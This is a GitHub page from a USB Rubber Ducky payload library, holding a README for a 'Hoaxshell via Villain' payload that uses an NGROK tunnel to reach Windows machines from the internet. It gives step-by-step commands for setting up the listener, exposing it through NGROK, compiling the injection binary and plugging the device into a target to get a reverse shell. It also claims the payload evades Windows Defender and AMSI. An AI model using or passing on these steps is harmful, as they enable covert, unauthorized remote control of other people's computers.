usbrubberducky-payloads/payloads/library/remote_access/VillainShellviaNGROKTunnel
HackingMark cd5b5d8ab4
Update payload.txt
2023-02-16 12:29:14 +01:00
..
media Add files via upload 2023-02-09 14:58:15 +01:00
README.MD Add Readme 2023-02-09 15:09:02 +01:00
payload.txt Update payload.txt 2023-02-16 12:29:14 +01:00

README.MD

Title: Hoaxshell via Villain Payload and NGROK Tunnel

Author: HackingMark
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, powershell, Linux Maschine with Villain, NGROK

What is Villain?

Villain is a Toolset to setup Payloads and Listener for Hoaxshell Hoaxshell is actually undetected by Windows Defender and the Payload is optimized to bypass AMSITrigger *The Powershell Payload connects the target Machine back to the Hoaxshell Server, NGROK makes this Server reachable from the Internet. * That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.

How to use this Payload

First clone Villain from Repo: git clone https://github.com/t3l3machus/Villain Then install Requirements: cd Villain pip install -r ./requirements.txt Allow Villain to start: chmod +x ./Villain.py Fire it up: ./Villain.py Generate a payload to get the session identifier: generate os=windows lhost=0.0.0.0 lport=8080 alt text

Establish NGROK Tunnel forwarding Traffic to our Hoaxshell Engine ngrok http 8080 alt text Leave this Window open alt text

Preparing the Payload: You need 2 Values from above: NGROK HTTPS Link and Session Identifier from Villain Put it into the Payload then compile it to inject.bin and download. alt text

Copy your Inject.bin to your Ducky!

Plug your Ducky into a Windows target.
Achieve reverse shell.
open a shell with

`shell SESSION-ID`